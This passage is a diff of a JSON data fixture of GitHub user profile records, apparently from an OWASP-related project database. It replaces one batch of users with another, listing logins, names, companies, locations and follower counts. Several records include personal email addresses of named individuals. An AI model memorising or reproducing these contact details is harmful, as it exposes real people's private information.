"is_hireable": false, "twitter_username": "" @@ -428953,49 +688502,49 @@ }, { "model": "github.user", - "pk": 2749, + "pk": 8104, "fields": { - "nest_created_at": "2024-09-12T02:14:31.068Z", - "nest_updated_at": "2024-09-12T02:14:33.146Z", - "name": "Worming", - "login": "worming004", + "nest_created_at": "2024-09-22T09:42:06.221Z", + "nest_updated_at": "2024-09-22T19:42:31.624Z", + "name": "Ross Nanopoulos", + "login": "zythosec", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23192591?v=4", - "company": "CraftLab IT", - "location": "Belgium", + "avatar_url": "https://avatars.githubusercontent.com/u/2287187?v=4", + "company": "", + "location": "Boston, MA", "collaborators_count": 0, - "following_count": 125, - "followers_count": 22, + "following_count": 27, + "followers_count": 27, "public_gists_count": 2, - "public_repositories_count": 121, - "created_at": "2016-11-01T14:04:12Z", - "updated_at": "2024-09-10T16:36:40Z", - "node_id": "MDQ6VXNlcjIzMTkyNTkx", + "public_repositories_count": 7, + "created_at": "2012-09-05T19:52:29Z", + "updated_at": "2024-09-15T11:24:00Z", + "node_id": "MDQ6VXNlcjIyODcxODc=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "zythosec" } }, { "model": "github.user", - "pk": 2750, + "pk": 8105, "fields": { - "nest_created_at": "2024-09-12T02:15:19.141Z", - "nest_updated_at": "2024-09-12T02:15:19.141Z", - "name": "", - "login": "duzztie", + "nest_created_at": "2024-09-22T09:42:08.788Z", + "nest_updated_at": "2024-09-22T19:42:33.929Z", + "name": "Lars Haulin", + "login": "LarsH", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53379096?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1294050?v=4", "company": "", - "location": "", + "location": "Sweden", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-07-27T17:59:20Z", - "updated_at": "2024-06-09T15:24:12Z", - "node_id": "MDQ6VXNlcjUzMzc5MDk2", + "followers_count": 13, + "public_gists_count": 3, + "public_repositories_count": 17, + "created_at": "2011-12-29T23:11:29Z", + "updated_at": "2024-09-11T13:38:10Z", + "node_id": "MDQ6VXNlcjEyOTQwNTA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429003,49 +688552,49 @@ }, { "model": "github.user", - "pk": 2751, + "pk": 8106, "fields": { - "nest_created_at": "2024-09-12T02:15:21.662Z", - "nest_updated_at": "2024-09-12T02:15:21.662Z", - "name": "Calle Kabo", - "login": "kabo", + "nest_created_at": "2024-09-22T09:42:09.101Z", + "nest_updated_at": "2024-09-22T19:42:34.238Z", + "name": "Jérôme Foray", + "login": "Meroje", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/357601?v=4", - "company": "KaboHub", - "location": "New Zealand", + "avatar_url": "https://avatars.githubusercontent.com/u/304101?v=4", + "company": "@BedrockStreaming", + "location": "Lyon, France", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 3, - "public_repositories_count": 33, - "created_at": "2010-08-08T10:11:33Z", - "updated_at": "2024-09-12T02:01:00Z", - "node_id": "MDQ6VXNlcjM1NzYwMQ==", - "bio": "I'm primarily on https://gitlab.com/users/kabo/projects", + "following_count": 76, + "followers_count": 79, + "public_gists_count": 39, + "public_repositories_count": 96, + "created_at": "2010-06-13T12:55:21Z", + "updated_at": "2024-09-10T11:45:16Z", + "node_id": "MDQ6VXNlcjMwNDEwMQ==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2752, + "pk": 8107, "fields": { - "nest_created_at": "2024-09-12T02:15:22.516Z", - "nest_updated_at": "2024-09-12T02:15:22.516Z", - "name": "Michal Pazucha", - "login": "michalmc", + "nest_created_at": "2024-09-22T09:42:10.386Z", + "nest_updated_at": "2024-09-22T19:42:35.192Z", + "name": "", + "login": "Codingendless", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59824956?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84778671?v=4", + "company": "40CoderPlus", + "location": "China", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 15, + "followers_count": 12, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-01-13T10:04:33Z", - "updated_at": "2024-04-11T13:46:27Z", - "node_id": "MDQ6VXNlcjU5ODI0OTU2", + "public_repositories_count": 15, + "created_at": "2021-05-25T11:10:13Z", + "updated_at": "2024-08-15T01:56:01Z", + "node_id": "MDQ6VXNlcjg0Nzc4Njcx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429053,74 +688602,74 @@ }, { "model": "github.user", - "pk": 2753, + "pk": 8108, "fields": { - "nest_created_at": "2024-09-12T02:15:28.648Z", - "nest_updated_at": "2024-09-18T19:08:44.979Z", - "name": "OWASP BLT", - "login": "OWASP-BLT", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/160347863?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:42:17.214Z", + "nest_updated_at": "2024-09-22T19:41:23.625Z", + "name": "Alec Malcolm", + "login": "alec-malcolm", + "email": "alec.malcolm@camis.com", + "avatar_url": "https://avatars.githubusercontent.com/u/84037272?v=4", + "company": "@camisinc ", + "location": "Kitchener", "collaborators_count": 0, - "following_count": 0, - "followers_count": 9, + "following_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2024-02-17T18:23:06Z", - "updated_at": "2024-09-01T11:32:49Z", - "node_id": "O_kgDOCY621w", - "bio": "", + "public_repositories_count": 2, + "created_at": "2021-05-11T17:17:55Z", + "updated_at": "2024-09-12T11:40:31Z", + "node_id": "MDQ6VXNlcjg0MDM3Mjcy", + "bio": "Staff Software Developer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2754, + "pk": 8109, "fields": { - "nest_created_at": "2024-09-12T02:15:32.431Z", - "nest_updated_at": "2024-09-18T19:08:43.201Z", - "name": "Fred Falcon", - "login": "fredfalcon", + "nest_created_at": "2024-09-22T09:42:17.528Z", + "nest_updated_at": "2024-09-22T19:41:23.932Z", + "name": "Benjamin Pahl", + "login": "DasBen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7475382?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8275915?v=4", + "company": "Freenet DLS GmbH", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-05-03T17:11:35Z", - "updated_at": "2024-08-18T19:54:36Z", - "node_id": "MDQ6VXNlcjc0NzUzODI=", - "bio": "", + "public_repositories_count": 15, + "created_at": "2014-07-26T15:21:42Z", + "updated_at": "2024-07-17T21:12:15Z", + "node_id": "MDQ6VXNlcjgyNzU5MTU=", + "bio": "Api, Microservice and Backend Developer", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2755, + "pk": 8110, "fields": { - "nest_created_at": "2024-09-12T02:15:33.279Z", - "nest_updated_at": "2024-09-12T02:19:35.519Z", - "name": "", - "login": "bug-reporter-bot", + "nest_created_at": "2024-09-22T09:42:17.854Z", + "nest_updated_at": "2024-09-22T19:41:24.249Z", + "name": "Märt Erlenheim", + "login": "entigo-mart-erlenheim", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24620264?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71629159?v=4", + "company": "@entigolabs ", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2016-12-17T09:55:18Z", - "updated_at": "2023-04-03T19:25:20Z", - "node_id": "MDQ6VXNlcjI0NjIwMjY0", + "created_at": "2020-09-21T07:06:21Z", + "updated_at": "2024-07-30T07:14:38Z", + "node_id": "MDQ6VXNlcjcxNjI5MTU5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429128,174 +688677,174 @@ }, { "model": "github.user", - "pk": 2756, + "pk": 8111, "fields": { - "nest_created_at": "2024-09-12T02:15:41.326Z", - "nest_updated_at": "2024-09-12T02:18:20.436Z", - "name": "H4N1L", - "login": "HanilJain", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/119354421?v=4", - "company": "Bits Pilani Pilani campus", - "location": "", + "nest_created_at": "2024-09-22T09:42:18.164Z", + "nest_updated_at": "2024-09-22T19:41:24.560Z", + "name": "Edwin Joassart", + "login": "aethernet", + "email": "edwin@blck.coffee", + "avatar_url": "https://avatars.githubusercontent.com/u/447631?v=4", + "company": "blck.coffee", + "location": "Liège belgium", "collaborators_count": 0, - "following_count": 4, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2022-11-28T18:58:15Z", - "updated_at": "2024-08-21T12:49:37Z", - "node_id": "U_kgDOBx00NQ", - "bio": "Python | Go | Docker | REST API | DJango | HTML/CSS | JS | WebD | Figma | WebPentesting", + "following_count": 9, + "followers_count": 17, + "public_gists_count": 1, + "public_repositories_count": 46, + "created_at": "2010-10-20T23:45:54Z", + "updated_at": "2024-09-09T16:07:51Z", + "node_id": "MDQ6VXNlcjQ0NzYzMQ==", + "bio": "uns.igned, balena, 3kd\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2757, + "pk": 8112, "fields": { - "nest_created_at": "2024-09-12T02:15:42.954Z", - "nest_updated_at": "2024-09-12T02:15:42.954Z", - "name": "Geerivana", - "login": "gauravloj", + "nest_created_at": "2024-09-22T09:42:19.135Z", + "nest_updated_at": "2024-09-22T19:41:25.555Z", + "name": "Maurycy Widera", + "login": "maulemon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6872672?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8656471?v=4", + "company": "@BradyPLC ", + "location": "Edinburgh, UK", "collaborators_count": 0, - "following_count": 7, - "followers_count": 2, - "public_gists_count": 1, - "public_repositories_count": 32, - "created_at": "2014-03-06T12:21:12Z", - "updated_at": "2024-08-06T20:50:14Z", - "node_id": "MDQ6VXNlcjY4NzI2NzI=", - "bio": "Full stack developer", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2014-09-04T14:06:46Z", + "updated_at": "2024-07-09T07:52:05Z", + "node_id": "MDQ6VXNlcjg2NTY0NzE=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2758, + "pk": 8113, "fields": { - "nest_created_at": "2024-09-12T02:16:28.786Z", - "nest_updated_at": "2024-09-12T02:18:42.819Z", - "name": "Bishal Das", - "login": "CodeWithBishal", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/69814108?v=4", - "company": "", - "location": "Indore, India", + "nest_created_at": "2024-09-22T09:42:25.228Z", + "nest_updated_at": "2024-09-22T19:41:31.718Z", + "name": "Edvin N", + "login": "NissesSenap", + "email": "edvin.norling@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/14774899?v=4", + "company": "@Kognic", + "location": "Gothenburg", "collaborators_count": 0, - "following_count": 7, - "followers_count": 14, - "public_gists_count": 0, - "public_repositories_count": 31, - "created_at": "2020-08-17T17:31:46Z", - "updated_at": "2024-09-05T19:46:31Z", - "node_id": "MDQ6VXNlcjY5ODE0MTA4", - "bio": "GSoC'24 @ OWASP || \r\nCoding ⌨️\r\nSpace 🚀\r\nChess ♖", + "following_count": 18, + "followers_count": 27, + "public_gists_count": 3, + "public_repositories_count": 64, + "created_at": "2015-09-22T13:00:41Z", + "updated_at": "2024-07-15T10:29:16Z", + "node_id": "MDQ6VXNlcjE0Nzc0ODk5", + "bio": "Work at Kognic as a platform engineer\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2759, + "pk": 8114, "fields": { - "nest_created_at": "2024-09-12T02:16:31.136Z", - "nest_updated_at": "2024-09-12T02:17:43.607Z", - "name": "Sarthak5598", - "login": "Sarthak5598", + "nest_created_at": "2024-09-22T09:42:25.541Z", + "nest_updated_at": "2024-09-22T19:41:32.036Z", + "name": "", + "login": "pawelmrowka", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/108613416?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/98846855?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2022-07-03T10:57:18Z", - "updated_at": "2024-08-01T14:11:15Z", - "node_id": "U_kgDOBnlPKA", - "bio": "Hey guys, I am B-tech CE student \r\n\r\nI am a Open Source Contributor\r\n\r\nOpen for work!", + "public_repositories_count": 1, + "created_at": "2022-02-01T19:50:06Z", + "updated_at": "2024-09-14T12:40:46Z", + "node_id": "U_kgDOBeRIhw", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2760, + "pk": 8115, "fields": { - "nest_created_at": "2024-09-12T02:16:32.891Z", - "nest_updated_at": "2024-09-12T02:17:08.671Z", - "name": "Altafur Rahman", - "login": "JisanAR03", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/97744811?v=4", + "nest_created_at": "2024-09-22T09:42:25.857Z", + "nest_updated_at": "2024-09-22T19:41:32.349Z", + "name": "Arnaud Hatzenbuhler", + "login": "Wihrt", + "email": "arnaud.hatzenbuhler@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29458917?v=4", "company": "", - "location": "", + "location": "Rennes", "collaborators_count": 0, - "following_count": 2, + "following_count": 1, "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2022-01-14T14:28:53Z", - "updated_at": "2024-09-04T22:33:34Z", - "node_id": "U_kgDOBdN3qw", + "public_gists_count": 3, + "public_repositories_count": 25, + "created_at": "2017-06-15T14:01:34Z", + "updated_at": "2024-08-23T07:06:05Z", + "node_id": "MDQ6VXNlcjI5NDU4OTE3", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2761, + "pk": 8116, "fields": { - "nest_created_at": "2024-09-12T02:16:34.608Z", - "nest_updated_at": "2024-09-18T19:08:48.174Z", - "name": "", - "login": "Uttkarsh-raj", + "nest_created_at": "2024-09-22T09:42:26.191Z", + "nest_updated_at": "2024-09-22T19:41:32.665Z", + "name": "Arteon Prifti", + "login": "arteonprifti", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/106571927?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/36534667?v=4", "company": "", - "location": "Bangalore, India", + "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 14, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 43, - "created_at": "2022-05-31T03:35:14Z", - "updated_at": "2024-09-13T21:08:02Z", - "node_id": "U_kgDOBloolw", - "bio": "GSoC'24 @OWASP | Flutter| Golang", + "public_repositories_count": 2, + "created_at": "2018-02-16T10:47:40Z", + "updated_at": "2024-02-23T16:44:47Z", + "node_id": "MDQ6VXNlcjM2NTM0NjY3", + "bio": "", "is_hireable": false, - "twitter_username": "__uttkarsh__" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2762, + "pk": 8117, "fields": { - "nest_created_at": "2024-09-12T02:16:36.787Z", - "nest_updated_at": "2024-09-12T02:18:43.215Z", - "name": "", - "login": "CodewithbishalBLT", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/172189947?v=4", + "nest_created_at": "2024-09-22T09:42:27.141Z", + "nest_updated_at": "2024-09-22T19:41:33.597Z", + "name": "Jaz Ark", + "login": "jazark", + "email": "jark99@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26463850?v=4", "company": "", - "location": "", + "location": "Toronto, Ontario, Canada", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2024-06-09T13:02:23Z", - "updated_at": "2024-09-05T19:46:43Z", - "node_id": "U_kgDOCkNo-w", + "public_repositories_count": 3, + "created_at": "2017-03-16T15:08:20Z", + "updated_at": "2024-05-06T16:42:34Z", + "node_id": "MDQ6VXNlcjI2NDYzODUw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429303,224 +688852,224 @@ }, { "model": "github.user", - "pk": 2763, + "pk": 8118, "fields": { - "nest_created_at": "2024-09-12T02:18:27.793Z", - "nest_updated_at": "2024-09-12T02:18:27.793Z", - "name": "Dev Gajjar", - "login": "DevGajjar28", + "nest_created_at": "2024-09-22T09:42:27.496Z", + "nest_updated_at": "2024-09-22T19:41:33.937Z", + "name": "", + "login": "RankXen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/145287513?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/22856899?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 52, - "created_at": "2023-09-17T18:03:10Z", - "updated_at": "2024-08-21T09:36:44Z", - "node_id": "U_kgDOCKjpWQ", - "bio": "Hello I am Dev ,\"Enthusiastic developer 💻 , dedicated to crafting elegant solutions and pushing the boundaries of technology.\"", - "is_hireable": true, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 4, + "public_repositories_count": 1, + "created_at": "2016-10-15T15:08:06Z", + "updated_at": "2024-09-11T13:08:28Z", + "node_id": "MDQ6VXNlcjIyODU2ODk5", + "bio": "I love huskies.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2764, + "pk": 8119, "fields": { - "nest_created_at": "2024-09-12T02:18:29.915Z", - "nest_updated_at": "2024-09-12T02:18:29.915Z", - "name": "Nikhil Raj", - "login": "nikhil25803", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/93156825?v=4", - "company": "ClueLess", - "location": "Kolkata", + "nest_created_at": "2024-09-22T09:42:28.140Z", + "nest_updated_at": "2024-09-22T19:41:34.563Z", + "name": "Sergiy Kulanov", + "login": "SergK", + "email": "sergey@kulanov.org.ua", + "avatar_url": "https://avatars.githubusercontent.com/u/1520525?v=4", + "company": "", + "location": "Ukraine", "collaborators_count": 0, - "following_count": 40, - "followers_count": 121, - "public_gists_count": 0, - "public_repositories_count": 60, - "created_at": "2021-10-25T18:58:02Z", - "updated_at": "2024-08-27T12:44:23Z", - "node_id": "U_kgDOBY112Q", - "bio": "Backend and Cloud Engineer ☁️ | Prev. SDE Intern at Dashmed and Backend Developer Intern at Edilitics and TaskLabs 💼| 1x National Level Hackathon 🏆", + "following_count": 3, + "followers_count": 23, + "public_gists_count": 13, + "public_repositories_count": 136, + "created_at": "2012-03-09T15:45:31Z", + "updated_at": "2024-07-03T14:48:47Z", + "node_id": "MDQ6VXNlcjE1MjA1MjU=", + "bio": "", "is_hireable": false, - "twitter_username": "humans_write" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2765, + "pk": 8120, "fields": { - "nest_created_at": "2024-09-12T02:20:20.401Z", - "nest_updated_at": "2024-09-12T02:20:20.401Z", - "name": "Jayraj Dulange", - "login": "Deus1704", + "nest_created_at": "2024-09-22T09:42:29.423Z", + "nest_updated_at": "2024-09-22T19:41:35.814Z", + "name": "", + "login": "skooNI", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/117574289?v=4", - "company": "", - "location": "IIT Gandhinagar, Gujarat", + "avatar_url": "https://avatars.githubusercontent.com/u/60897865?v=4", + "company": "NI", + "location": "Austin, TX", "collaborators_count": 0, - "following_count": 19, - "followers_count": 19, - "public_gists_count": 2, - "public_repositories_count": 32, - "created_at": "2022-11-06T11:44:28Z", - "updated_at": "2024-08-30T12:04:43Z", - "node_id": "U_kgDOBwIKkQ", - "bio": "GSoC'24 @Sunpy | UG at IIT Gandhinagar.", + "following_count": 3, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-02-10T19:36:19Z", + "updated_at": "2024-08-26T15:50:43Z", + "node_id": "MDQ6VXNlcjYwODk3ODY1", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2766, + "pk": 8121, "fields": { - "nest_created_at": "2024-09-12T02:20:21.668Z", - "nest_updated_at": "2024-09-12T02:20:21.668Z", - "name": "Santhosh Mani ", - "login": "Santhoshmani1", - "email": "pitakasanthosh@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/119673958?v=4", - "company": "", - "location": "India", + "nest_created_at": "2024-09-22T09:42:29.748Z", + "nest_updated_at": "2024-09-22T19:41:36.145Z", + "name": "", + "login": "stexandev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9717268?v=4", + "company": "SUB Göttingen ", + "location": "Göttingen ", "collaborators_count": 0, - "following_count": 7, - "followers_count": 12, - "public_gists_count": 5, - "public_repositories_count": 17, - "created_at": "2022-12-02T12:24:02Z", - "updated_at": "2024-08-28T08:08:10Z", - "node_id": "U_kgDOByIUZg", + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-11-13T10:32:36Z", + "updated_at": "2024-09-11T08:48:08Z", + "node_id": "MDQ6VXNlcjk3MTcyNjg=", "bio": "", "is_hireable": false, - "twitter_username": "Santhoshmani_p" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2767, + "pk": 8122, "fields": { - "nest_created_at": "2024-09-12T02:20:34.415Z", - "nest_updated_at": "2024-09-12T02:20:34.415Z", - "name": "", - "login": "letsintegreat", + "nest_created_at": "2024-09-22T09:42:38.669Z", + "nest_updated_at": "2024-09-22T19:41:45.175Z", + "name": "Noel Cortes", + "login": "cortesnoel-lm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37345795?v=4", - "company": "", - "location": "India", + "avatar_url": "https://avatars.githubusercontent.com/u/136741673?v=4", + "company": "Lockheed Martin", + "location": "", "collaborators_count": 0, - "following_count": 17, - "followers_count": 53, - "public_gists_count": 2, - "public_repositories_count": 47, - "created_at": "2018-03-13T17:57:28Z", - "updated_at": "2024-09-02T11:47:20Z", - "node_id": "MDQ6VXNlcjM3MzQ1Nzk1", - "bio": "More or less an Android Dev.", + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2023-06-15T17:11:02Z", + "updated_at": "2024-07-22T15:25:10Z", + "node_id": "U_kgDOCCaDKQ", + "bio": "Full Stack Developer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2768, + "pk": 8123, "fields": { - "nest_created_at": "2024-09-12T02:20:35.245Z", - "nest_updated_at": "2024-09-12T02:20:36.073Z", - "name": "Amrit Prakash", - "login": "solo-daemon", + "nest_created_at": "2024-09-22T09:42:47.158Z", + "nest_updated_at": "2024-09-22T19:42:27.483Z", + "name": "", + "login": "jmayer-lm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65587505?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/177655748?v=4", "company": "", - "location": "IITR India", + "location": "", "collaborators_count": 0, - "following_count": 18, - "followers_count": 22, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 61, - "created_at": "2020-05-19T06:07:43Z", - "updated_at": "2024-08-16T11:55:38Z", - "node_id": "MDQ6VXNlcjY1NTg3NTA1", - "bio": "Yo! this is amrit and I like to try out new technologies", + "public_repositories_count": 2, + "created_at": "2024-08-06T14:56:33Z", + "updated_at": "2024-08-15T03:35:45Z", + "node_id": "U_kgDOCpbPxA", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2769, + "pk": 8124, "fields": { - "nest_created_at": "2024-09-12T02:20:42.738Z", - "nest_updated_at": "2024-09-12T02:20:43.593Z", - "name": "Parag Gupta", - "login": "Dante291", + "nest_created_at": "2024-09-22T09:42:51.578Z", + "nest_updated_at": "2024-09-22T19:42:28.103Z", + "name": "Zachary Prebosnyak", + "login": "zprebosnyak-lm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/103507835?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/91638307?v=4", + "company": "Lockheed Martin", "location": "", "collaborators_count": 0, - "following_count": 9, + "following_count": 3, "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2022-04-12T12:11:33Z", - "updated_at": "2024-09-02T09:51:49Z", - "node_id": "U_kgDOBitnew", - "bio": "Google Summer of Code @PalisadoesFoundation | XR and Flutter Developer", + "public_repositories_count": 2, + "created_at": "2021-09-29T22:13:35Z", + "updated_at": "2024-07-23T22:33:52Z", + "node_id": "U_kgDOBXZKIw", + "bio": "Full Stack Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2770, + "pk": 8125, "fields": { - "nest_created_at": "2024-09-12T02:21:05.531Z", - "nest_updated_at": "2024-09-12T02:21:05.531Z", - "name": "David Scrobonia", - "login": "dscrobonia", + "nest_created_at": "2024-09-22T09:42:51.888Z", + "nest_updated_at": "2024-09-22T19:42:27.176Z", + "name": "", + "login": "johnnyGogurt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5150944?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/49843922?v=4", "company": "", - "location": "United States", + "location": "", "collaborators_count": 0, - "following_count": 13, - "followers_count": 25, - "public_gists_count": 3, - "public_repositories_count": 27, - "created_at": "2013-08-02T22:10:43Z", - "updated_at": "2024-09-05T15:34:23Z", - "node_id": "MDQ6VXNlcjUxNTA5NDQ=", + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-04-21T18:53:08Z", + "updated_at": "2024-06-11T18:53:10Z", + "node_id": "MDQ6VXNlcjQ5ODQzOTIy", "bio": "", "is_hireable": false, - "twitter_username": "david_scrobonia" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2771, + "pk": 8126, "fields": { - "nest_created_at": "2024-09-12T02:21:06.325Z", - "nest_updated_at": "2024-09-12T02:21:06.325Z", - "name": "Ubaid Shamsi", - "login": "Shamsi12", + "nest_created_at": "2024-09-22T09:43:46.195Z", + "nest_updated_at": "2024-09-22T19:42:52.437Z", + "name": "", + "login": "codenox-vs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57343383?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/64482125?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2019-11-04T07:04:10Z", - "updated_at": "2024-09-01T20:08:22Z", - "node_id": "MDQ6VXNlcjU3MzQzMzgz", + "public_repositories_count": 4, + "created_at": "2020-04-28T14:14:52Z", + "updated_at": "2024-08-12T10:57:46Z", + "node_id": "MDQ6VXNlcjY0NDgyMTI1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429528,49 +689077,49 @@ }, { "model": "github.user", - "pk": 2772, + "pk": 8127, "fields": { - "nest_created_at": "2024-09-12T02:21:07.897Z", - "nest_updated_at": "2024-09-12T02:21:07.897Z", - "name": "", - "login": "youngklee", + "nest_created_at": "2024-09-22T09:43:46.623Z", + "nest_updated_at": "2024-09-22T19:42:52.744Z", + "name": "Alistair Mackay", + "login": "fireflycons", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1425072?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/34012094?v=4", "company": "", - "location": "", + "location": "London, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, + "following_count": 2, + "followers_count": 88, "public_gists_count": 4, - "public_repositories_count": 37, - "created_at": "2012-02-10T02:25:34Z", - "updated_at": "2024-04-24T19:08:23Z", - "node_id": "MDQ6VXNlcjE0MjUwNzI=", - "bio": "", + "public_repositories_count": 59, + "created_at": "2017-11-26T22:02:53Z", + "updated_at": "2024-08-25T11:38:06Z", + "node_id": "MDQ6VXNlcjM0MDEyMDk0", + "bio": "AWS DevOps/Architecture contractor with over 25 years experience in IT.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2773, + "pk": 8128, "fields": { - "nest_created_at": "2024-09-12T02:21:09.559Z", - "nest_updated_at": "2024-09-12T02:21:10.396Z", + "nest_created_at": "2024-09-22T09:43:47.954Z", + "nest_updated_at": "2024-09-22T19:42:54.049Z", "name": "", - "login": "DeDarko", + "login": "aksagrimada", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45122738?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1955605?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2018-11-17T12:43:27Z", - "updated_at": "2023-01-13T08:14:02Z", - "node_id": "MDQ6VXNlcjQ1MTIyNzM4", + "public_repositories_count": 9, + "created_at": "2012-07-11T09:40:01Z", + "updated_at": "2024-09-02T12:34:48Z", + "node_id": "MDQ6VXNlcjE5NTU2MDU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429578,24 +689127,74 @@ }, { "model": "github.user", - "pk": 2774, + "pk": 8129, "fields": { - "nest_created_at": "2024-09-12T02:21:11.211Z", - "nest_updated_at": "2024-09-12T02:21:11.211Z", - "name": "Eric Jiang", - "login": "eric-jiang", + "nest_created_at": "2024-09-22T09:43:51.658Z", + "nest_updated_at": "2024-09-22T19:42:57.653Z", + "name": "Ray", + "login": "DotNetAge", + "email": "csharp2002@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5257552?v=4", + "company": "广州睿雅信息科技有限公司", + "location": 